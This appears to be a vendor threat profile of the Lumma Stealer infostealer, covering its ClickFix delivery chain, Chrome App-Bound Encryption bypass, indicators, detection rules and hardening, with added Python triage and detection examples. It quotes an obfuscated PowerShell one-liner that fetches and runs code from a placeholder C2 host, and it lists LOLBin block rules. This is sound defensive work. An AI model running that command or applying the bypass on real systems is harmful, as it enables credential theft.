Lumma Stealer

Infostealer (MaaS) · First seen August 2022

Overview

Lumma Stealer is a Windows-targeting infostealer operated as malware-as-a-service since August 2022. Microsoft tracks the operator family as Storm-2477. Affiliates rent the malware on Russian-speaking cybercrime forums under tiered subscriptions, with full source code reportedly priced at around $20,000. Once executed, Lumma harvests browser-saved credentials, session cookies, multi-factor authentication tokens, cryptocurrency wallet data, and local authentication artifacts, then exfiltrates to attacker-controlled infrastructure.

It is the most widely deployed infostealer of the past two years. Microsoft identified 394,000 infected Windows hosts in a 90-day window ending May 2025; the FBI estimates 10 million cumulative infections globally. Microsoft describes Lumma as the most prolific ClickFix final payload based on its own threat-hunting data.

Lumma's infrastructure was disrupted in a May 2025 coordinated action by Microsoft's Digital Crimes Unit, the US Department of Justice, Europol, and Japan's Cybercrime Control Center. The operation disrupted approximately 2,300 malicious domains, with 1,300+ seized or transferred to Microsoft. Lumma rebuilt within days and remains active. The most recent documented evolution is a Windows Terminal-based delivery variant disclosed by Microsoft Threat Intelligence on March 5, 2026.

Lumma is not used directly for ransomware deployment. It is a credential-acquisition tool that feeds the broader ransomware ecosystem. Stolen credentials are sold to initial-access brokers and ultimately to ransomware operators, most notably Octo Tempest, also tracked as Scattered Spider.

Operational attack chain · ClickFix-to-Lumma
  1. Start: Malicious website · Malvertising · crack lure · phishing
  2. Stage 1: Fake CAPTCHA · JS hijacks clipboard
  3. Stage 2 (user action): Win+R → paste → Enter · explorer / wt.exe parent
  4. Stage 3: PowerShell fetches loader · powershell -w h … | iex · CastleLoader / IDAT / Emmenhtal
  5. Stage 4: Injected into browser · QueueUserAPC() → chrome / edge
  6. Stage 5: ABE bypass · credentials stolen · IElevator COM → Login Data · cookies · wallets
  7. Impact: Sold to IABs → ransomware operators

ClickFix is the dominant delivery method. Other vectors, such as direct installer download, fake GitHub repositories, and phishing attachments, skip stages 1 and 2 entirely.

Tactics, techniques, and procedures

Lumma maps to multiple MITRE ATT&CK Enterprise tactics, with the highest technique density in Execution and Defense Evasion. The coverage map below combines official Lumma software mappings with observed ClickFix delivery behavior.

Key techniques · Lumma Stealer

Tactic · What Lumma does

  • Initial Access: Phishing links and compromised sites funnel victims to fake CAPTCHA or cracked software lure pages.
  • Execution: User pastes clipboard command into Run dialog or Windows Terminal. PowerShell, mshta, or MSBuild executes — no exploit, no CVE.
  • Persistence: Registry Run keys or scheduled tasks, affiliate-configured. Many campaigns skip persistence — first execution already completes the theft.
  • Defense Evasion: Clipboard payload padded with whitespace. Loaders detect VMs before decrypting, obfuscate across multiple layers, and sideload via signed binaries so the parent process appears trusted. QueueUserAPC() injection into chrome.exe is the mechanism that defeats ABE's process-identity check — injection is not just evasion here, it is the prerequisite for credential access.
  • Credential Access: Decrypts credentials via DPAPI (blob prefix v10, Chrome <127) or ABE bypass (blob prefix v20, Chrome 127+). Encryption key sourced from Local State. Data targets: Login Data, Cookies, Web Data. Steals session cookies with HttpOnly/Secure flags intact — bypasses MFA without cracking the second factor.
  • Discovery: Collects hardware ID, OS version, installed software. Used to fingerprint and price the compromised machine before selling access.
  • Collection: Enumerates 80+ crypto wallet apps and browser extensions, VPN configs, email clients, FTP clients, and Telegram data.
  • Command and Control: HTTPS POST to rotating C2. DNS variant retrieves payload fragments via TXT records. Post-takedown C2 shifted from Cloudflare to Selectel (Russian hosting).
  • Exfiltration: All stolen data sent over the C2 channel. Traffic typically under 500KB per host — below most DLP thresholds.
  • Recon / Resource Dev / Priv Esc / Lateral / Impact: Not observed. Handled by operators or downstream ransomware affiliates.
Stage 1 · T1566.002 · T1204.002 · T1115

The ClickFix lure

Lumma is delivered through ClickFix, a social engineering technique that has become the single most common Windows initial-access method. Microsoft's 2025 Digital Defense Report attributes 47% of observed attacks to ClickFix, outpacing traditional phishing.

The lure page renders a fake Cloudflare Turnstile, Google reCAPTCHA, browser update prompt, or document-viewer error. When the victim clicks "verify," hidden JavaScript silently writes a malicious command to the clipboard. The page then displays a three-step instruction: Win+R, Ctrl+V, Enter.

A February 2026 variant disclosed by Microsoft Threat Intelligence instructs Win+X then I instead, launching Windows Terminal. The change defeats EDR rules tuned for Run-dialog parentage.

ClickFix is not the only delivery vector. Other active Lumma distribution methods include: direct installer download via malvertising (user downloads a signed MSI or ZIP, no clipboard involved); fake GitHub repositories with AI-generated READMEs promoting game cheats or cracked tools; phishing email attachments (password-protected ZIP containing an LNK or MSI); and social media lures via YouTube and Facebook linking to Google Sites-hosted payloads. These vectors skip the clipboard stages entirely and enter the kill chain at Stage 3 (loader execution). Detection coverage for these paths relies on Stages 3 to 5 rather than clipboard-to-process correlation.

Stage 2 · T1059.001 · T1027 · T1140 · T1218

The clipboard payload

The string placed on the clipboard is almost always obfuscated. A representative pattern observed in live campaigns:

Representative PowerShell payload
powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm hxxp://[C2_IP]:8080/$u|iex"

Pattern documented in Microsoft Threat Intelligence reporting

Three techniques stack in that single line. The -w h flag hides the PowerShell window. The irm call (Invoke-RestMethod) fetches a remote payload. The URL path is a time bucket — the command builds a URL like hxxp://[C2]:8080/1746403200 where the number is the current Unix timestamp rounded down to a 16-second window (the -band 0xfffffffffffffff0 strips the last 4 bits). The C2 server only serves the payload during that specific window. If a security analyst captures the command and replays it ten minutes later, the URL path has changed and the server returns nothing — the payload is ephemeral and cannot be retrieved after the fact for inspection.

Other delivery variants observed in current campaigns:

  • mshta.exe fetching an HTA containing VBScript (T1218.005)
  • nslookup -type=txt retrieving base64 payload fragments in DNS TXT records (T1071.004)
  • MSBuild.exe invoked from a batch-to-VBScript chain communicating with blockchain RPC endpoints for EtherHiding-based C2
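
As an added example (not code from the page or from Microsoft), a Python triage helper that scores a captured command line for the stacked tells described above and recovers the 16-second serving window from a URL path value; the PAYLOAD string reproduces the page's representative pattern with [C2_IP] left as a placeholder.

```python
import re

# Added example (not from the page or any vendor tool): scores a captured
# PowerShell command line for the stacked ClickFix tells and recovers the
# 16-second window during which the time-bucketed URL path was served.

MASK = 0xFFFFFFFFFFFFFFF0   # the payload's -band mask: clears the low 4 bits
WINDOW_SECONDS = 16

# Constructed sample in the page's representative shape; [C2_IP] is a placeholder.
PAYLOAD = ("powershell -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]"
           "'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;"
           "irm hxxp://[C2_IP]:8080/$u|iex\"")

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
FETCH = re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
# [datetime]::UtcNow ... .TotalSeconds ... -band 0x...f0 : epoch bucketing
BUCKET = re.compile(r"TotalSeconds.*?-band\s+0x[0-9a-f]*f0\b", re.I | re.S)

def bucket(epoch_seconds: int) -> int:
    """Mirror the payload's $u: Unix time rounded down to a 16-second boundary."""
    return epoch_seconds & MASK

def serving_window(path_value: int) -> tuple:
    """(start, end) epoch seconds during which the C2 served this URL path."""
    start = bucket(path_value)
    return start, start + WINDOW_SECONDS

def replay_hits_same_path(captured_path: int, replay_epoch: int) -> bool:
    """True only if a replay at replay_epoch would rebuild the captured path."""
    return bucket(replay_epoch) == captured_path

def analyze_cmdline(cmd: str) -> dict:
    """Flag each technique the page describes; 'suspicious' needs fetch + iex."""
    f = {
        "hidden_window": bool(HIDDEN.search(cmd)),
        "remote_fetch": bool(FETCH.search(cmd)),
        "inline_execute": bool(IEX.search(cmd)),
        "epoch_bucketed_url": bool(BUCKET.search(cmd)),
    }
    f["suspicious"] = f["remote_fetch"] and f["inline_execute"]
    return f

if __name__ == "__main__":
    print(analyze_cmdline(PAYLOAD))
    print(serving_window(1746403200))   # (1746403200, 1746403216)
```

Given a captured path value and the capture time, serving_window tells the analyst whether the payload was ever retrievable after the fact, which is the ephemerality the section describes.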

Stage 3 · T1055 · T1574.002 · T1497 · T1620

The loader

The clipboard command does not deliver Lumma directly. It delivers a loader. Three loaders dominate current Lumma campaigns: CastleLoader (in-memory execution, multiple obfuscation layers), IDAT Loader (DLL sideloading via legitimate signed applications), and Emmenhtal / PEAKLIGHT (used in the ClearFake cluster, leverages EtherHiding to store payload fragments inside Binance Smart Chain smart contracts).

All three decrypt the Lumma payload in memory and never write an unpacked executable to disk. The payload is injected into running browser processes using the QueueUserAPC() API, targeting chrome.exe and msedge.exe.

Stage 4 · T1555.003 · T1539 · T1055.004 · T1115 · T1041

Credential theft and exfiltration

Lumma targets Chromium credential storage across two protection models depending on Chrome version. The encryption key is stored in Local State (the JSON file containing os_crypt.encrypted_key). The data targets are Login Data, Cookies, and Web Data SQLite files.

DPAPI (blob prefix v10, Chrome <127). Chrome historically encrypted the master key using Windows DPAPI (CryptProtectData). DPAPI binds decryption to the user's login session, not to a specific process — any process running in the same user context can call CryptUnprotectData to recover the key. This is why classic infostealers could simply copy browser files to a temp folder and decrypt them externally. No injection required for this path.

App-Bound Encryption bypass (blob prefix v20, Chrome 127+). Google introduced ABE in Chrome 127 specifically to close the DPAPI gap. ABE binds the master key to the browser's process identity via Chrome's IElevator COM service, which validates the caller before releasing the key. Any process outside chrome.exe is refused — this is why injection is required for v20 blobs. Injection is the mechanism that defeats ABE's process-identity check.

Once injected into chrome.exe via QueueUserAPC(), Lumma code runs inside the trusted process context. From there it calls Chrome's IElevator COM interface ({708860E0-F641-4611-8895-7D867DD3675B}). Because the call originates from inside chrome.exe, ABE's process-identity check passes. The interface returns the plaintext AES key, which Lumma uses to decrypt v20 cookies and passwords from the SQLite files.

Firefox is targeted separately through logins.json and key4.db, which use NSS (Network Security Services) encryption decryptable from within the user session context.

Browser cookies are exported with HttpOnly and Secure flags intact. This is how Lumma bypasses MFA: it does not crack the second factor — it steals the post-authentication session token and replays it. The February 2026 campaign additionally dropped Lumma to C:\ProgramData\app_config\ctjb and established scheduled-task persistence.

Process tree

What the kill chain looks like in EDR telemetry

Indicators of compromise

The indicators below are durable: file paths, registry keys, process patterns, and network behaviors that have remained consistent across Lumma campaigns and survive variant rotation.

File paths · 4 indicators

Locations where Lumma drops payload, persistence, or staging artifacts.

  • C:\ProgramData\app_config\ctjb · Lumma payload drop, Feb 2026 campaign
  • %AppData%\...\Startup\*.lnk · LNK shortcut persistence
  • %TEMP%\*.zip · Renamed 7-Zip extraction artifacts
  • %LocalAppData%\Temp\*.exe · Loader staging, often deleted post-execution

Registry keys · 3 indicators

Registry locations Lumma reads, writes, or leaves trace evidence in.

  • HKCU\...\Explorer\RunMRU · Durable forensic evidence of Run-dialog command
  • HKCU\...\CurrentVersion\Run · Persistence when configured by affiliate
  • HKLM\...\TaskCache\Tasks · Scheduled task persistence (Feb 2026)

Process tree patterns · 5 patterns

Parent-child execution chains that signal a Lumma kill chain in progress.

  • explorer.exe → powershell.exe [encoded command] · Classic Run-dialog ClickFix execution
  • explorer.exe → wt.exe → powershell.exe · Windows Terminal variant, Feb 2026+
  • [signed binary].exe → [tampered].dll → Lumma · DLL sideloading via IDAT/HijackLoader
  • chrome.exe ← QueueUserAPC() from non-browser · Browser injection, Microsoft-documented
  • [non-browser] → reads Login Data / logins.json · Direct credential database read

Network behavior · 4 patterns

Outbound traffic patterns observable at firewall, proxy, or DNS layer.

  • *.trycloudflare.com (random subdomains) · Cloudflare tunneling for C2
  • DNS TXT lookups · non-standard servers · nslookup-based payload retrieval
  • HTTPS POST to short-lived domains (< 72h) · Exfiltration to rotating C2
  • BNB Smart Chain RPC · non-wallet processes · EtherHiding payload retrieval

Detection guidance

Lumma's kill chain leaves a distinctive correlation pattern in its early stages. Signature-based scanning misses the payload because each loader build mutates. Behavioral detection catches it because the chain combines clipboard activity, trusted-binary execution, and browser-process anomalies in a sequence that legitimate user activity does not produce.

  1. Clipboard-to-process correlation · Endpoint telemetry

    Clipboard contents containing powershell, mshta, iex, nslookup, or base64 strings, followed within thirty seconds by execution of those same binaries with explorer.exe or wt.exe as parent.

    Why it works: legitimate users rarely paste these strings into the Run dialog. The thirty-second window correlates the lure with the execution.

  2. RunMRU registry writes · Registry monitoring

    New entries written to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU containing PowerShell, mshta, or encoded command syntax.

    Why it works: this key persists after the process exits, so the artifact is durable for forensic timelines.

  3. LOLBin parent-child anomalies · EDR / process telemetry

    Alert on powershell.exe, mshta.exe, wscript.exe, rundll32.exe, nslookup.exe, or MSBuild.exe spawning as direct children of explorer.exe or wt.exe with encoded or remote-fetching command lines.

    Why it works: in a normal user environment these binaries should never have those parents with those arguments.

  4. Browser process injection · EDR / API telemetry

    QueueUserAPC() calls into chrome.exe or msedge.exe from non-browser parent processes. Reads of logins.json, key4.db, or the Chromium Login Data SQLite file from any process other than the browser.

    Why it works: browsers self-read these files; outside processes never should.

  5. ABE bypass — IElevator COM instantiation · EDR / COM telemetry

    COM instantiation of {708860E0-F641-4611-8895-7D867DD3675B} (Chrome's IElevator interface) from a thread context that originated outside chrome.exe — i.e., from an injected thread. Alert on any process other than a legitimate Chrome installation invoking this CLSID.

    Why it works: this is the direct indicator of an ABE bypass in progress. Legitimate IElevator calls originate from Chrome's own process; a call from an injected thread is unambiguous evidence of credential theft against Chrome 127+.

  6. Network anomalies · Firewall / DNS / proxy logs

    Outbound connections to *.trycloudflare.com subdomains with random word patterns. Repeated DNS TXT-record queries against non-standard authoritative servers. Connections to blockchain RPC endpoints from non-wallet processes.

    Why it works: each pattern is a single-purpose tell — Cloudflare tunnels for C2, DNS for staged delivery, RPC for EtherHiding.
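
Detections 01 and 03 as working correlation logic over sample telemetry, added here as an example (not the page's code or any EDR product's rule); the event shapes and the clipboard and process events below are constructed assumptions.

```python
import re
from collections import namedtuple

# Added example (not from the page or any EDR product): correlates clipboard
# telemetry with process-creation events for detections 01 and 03 above.
# The event shapes are assumptions; the samples below are constructed.

Clip = namedtuple("Clip", "ts user text")                  # ts: epoch seconds
Proc = namedtuple("Proc", "ts user parent image cmdline")  # parent/image: exe names

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "nslookup.exe", "msbuild.exe"}
CLICKFIX_PARENTS = {"explorer.exe", "wt.exe"}
# clipboard text worth correlating: the page's token list plus a base64-looking run
CLIP_TOKENS = re.compile(r"powershell|mshta|\biex\b|nslookup|[A-Za-z0-9+/]{40,}={0,2}", re.I)
# encoded (-e/-enc/-EncodedCommand) or remote-fetching argument patterns
RISKY_ARGS = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+\S{20,}|"
                        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b|"
                        r"-type=txt|https?://|hxxp", re.I)

def lolbin_anomaly(p: Proc) -> bool:
    """Detection 03: LOLBin child of explorer.exe/wt.exe with risky arguments."""
    return (p.image.lower() in LOLBINS and p.parent.lower() in CLICKFIX_PARENTS
            and bool(RISKY_ARGS.search(p.cmdline)))

def correlate(clips, procs, window=30.0):
    """Detection 01: suspicious clipboard text followed within `window` seconds
    by a LOLBin child of explorer.exe/wt.exe for the same user."""
    alerts = []
    for c in clips:
        if not CLIP_TOKENS.search(c.text):
            continue
        for p in procs:
            if p.user != c.user or not 0 <= p.ts - c.ts <= window:
                continue
            if p.image.lower() in LOLBINS and p.parent.lower() in CLICKFIX_PARENTS:
                alerts.append({"user": c.user, "delay_s": p.ts - c.ts, "parent": p.parent,
                               "image": p.image, "lolbin_anomaly": lolbin_anomaly(p)})
    return alerts

# Constructed sample telemetry (not real captures); [C2_IP] is a placeholder.
CMD = 'powershell -w h -c "irm hxxp://[C2_IP]:8080/1746403200|iex"'
SAMPLE_CLIPS = [Clip(1000.0, "alice", CMD), Clip(2000.0, "bob", "quarterly budget")]
SAMPLE_PROCS = [
    Proc(1012.0, "alice", "explorer.exe", "powershell.exe", CMD),                 # ClickFix chain
    Proc(2005.0, "bob", "wt.exe", "powershell.exe", "powershell Get-ChildItem"),  # benign terminal use
    Proc(3000.0, "carol", "wt.exe", "powershell.exe",
         "powershell -enc PLACEHOLDER_BASE64_PLACEHOLDER"),                      # no clipboard evidence
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_CLIPS, SAMPLE_PROCS):
        print("clipboard-to-process:", a)
    for p in SAMPLE_PROCS:
        print("lolbin anomaly:", p.user, lolbin_anomaly(p))
```

The carol event shows why detection 03 is kept separate: a non-clipboard vector (installer, LNK, fake repo) still trips the parent-child rule even though detection 01 has nothing to correlate.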

Hardening recommendations

The four configuration changes below block the majority of current ClickFix variants at zero licensing cost. None requires a new product purchase. Items are tagged by deployment difficulty: Quick win = single GPO or rule, deployable in days. Standard = needs audit-mode rollout, deployable in weeks.

  1. Disable the Windows Run dialog for non-admin users · Quick win

    Set the NoRun Group Policy for user-tier accounts that do not need Run-dialog access. This single change defeats the most common ClickFix variant entirely.

    Path: User Configuration → Administrative Templates → Start Menu and Taskbar → Remove Run menu from Start Menu.

  2. Enable PowerShell script-block logging and Constrained Language Mode · Quick win

    Script-block logging captures obfuscated commands before execution, surfacing payloads even when they self-delete. Constrained Language Mode restricts the PowerShell features attackers rely on for in-memory execution and reflection.

    Path: Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell.

  3. Restrict LOLBin execution via AppLocker or WDAC · Standard

    Block or restrict mshta.exe, wscript.exe, cscript.exe, MSBuild.exe, and SyncAppvPublishingServer.vbs for non-admin contexts.

    Path: Computer Configuration → Windows Settings → Security Settings → Application Control Policies. Audit-mode rollout first.

  4. Block or alert on Windows Terminal as a PowerShell parent · Quick win

    The February 2026 ClickFix variant uses Windows Terminal (wt.exe) specifically because it bypasses Run-dialog detection rules.

    Path: Implement via EDR custom rule or AppLocker.

  5. Verify App-Bound Encryption is not disabled via policy · Quick win

    ABE is enabled by default in Chrome 127+. Attackers with admin access can disable it via Group Policy or registry, reverting Chrome to DPAPI-only protection and making credential theft trivial without injection.

    Verify: Confirm HKLM\SOFTWARE\Policies\Google\Chrome\ApplicationBoundEncryptionEnabled is not set to 0. If the key exists with that value, ABE is disabled and Chrome credentials are unprotected against any process running in the user session. Alert on writes to this key.
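
An added audit script (not the page's, Google's or any vendor's code) that complements item 5 and the v10/v20 distinction in the credential-theft section: it counts the ciphertext prefixes in a copied Login Data file to show which protection model the stored secrets actually use, without decrypting anything; the column name is Chromium's, the fixture database is constructed.

```python
import os
import sqlite3
import tempfile

# Added example (not from the page, Google or any vendor): audits a *copy* of a
# Chromium "Login Data" database by the version tag in front of each ciphertext.

def classify_blob(blob: bytes) -> str:
    """Chromium prefixes every encrypted value with a 3-byte version tag."""
    if blob.startswith(b"v20"):
        return "v20"          # App-Bound Encryption, Chrome 127+
    if blob.startswith(b"v10"):
        return "v10"          # DPAPI only
    return "unknown"

def audit_login_data(db_path: str) -> dict:
    """Count password blobs per model. Chrome locks the live file: audit a copy."""
    counts = {"v10": 0, "v20": 0, "unknown": 0}
    con = sqlite3.connect(db_path)
    con.execute("PRAGMA query_only = 1")      # never modify the evidence copy
    try:
        for (blob,) in con.execute("SELECT password_value FROM logins"):
            counts[classify_blob(blob or b"")] += 1
    finally:
        con.close()
    return counts

def protection_summary(counts: dict) -> str:
    """'dpapi-only' on a Chrome 127+ host is the condition item 5 describes:
    check the ApplicationBoundEncryptionEnabled policy value."""
    if counts["v20"] and not counts["v10"]:
        return "abe-only"
    if counts["v20"] and counts["v10"]:
        return "mixed"        # legacy rows written before the Chrome 127 upgrade
    return "dpapi-only" if counts["v10"] else "empty"

def build_sample_db(path: str) -> None:
    """Constructed fixture: Chromium's real column name, fake bytes after the tags."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, "
                "password_value BLOB)")
    con.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://example.test", "alice", b"v20" + os.urandom(28)),
        ("https://example.test", "bob", b"v20" + os.urandom(28)),
        ("https://legacy.example.test", "carol", b"v10" + os.urandom(28)),
    ])
    con.commit(); con.close()

def run_sample() -> tuple:
    """Build the fixture in a temp dir, audit it, return (counts, summary)."""
    path = os.path.join(tempfile.mkdtemp(), "Login Data")
    build_sample_db(path)
    counts = audit_login_data(path)
    return counts, protection_summary(counts)   # ({'v10': 1, 'v20': 2, 'unknown': 0}, 'mixed')
```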

How Malware Protection Plus responds

A walkthrough showing detection of the LOLBin execution chain, automated containment of the affected endpoint, and forensic capture of the command artifacts.

Primary references

Source material this page is built on. Last reviewed against Microsoft Threat Intelligence reporting through March 2026.
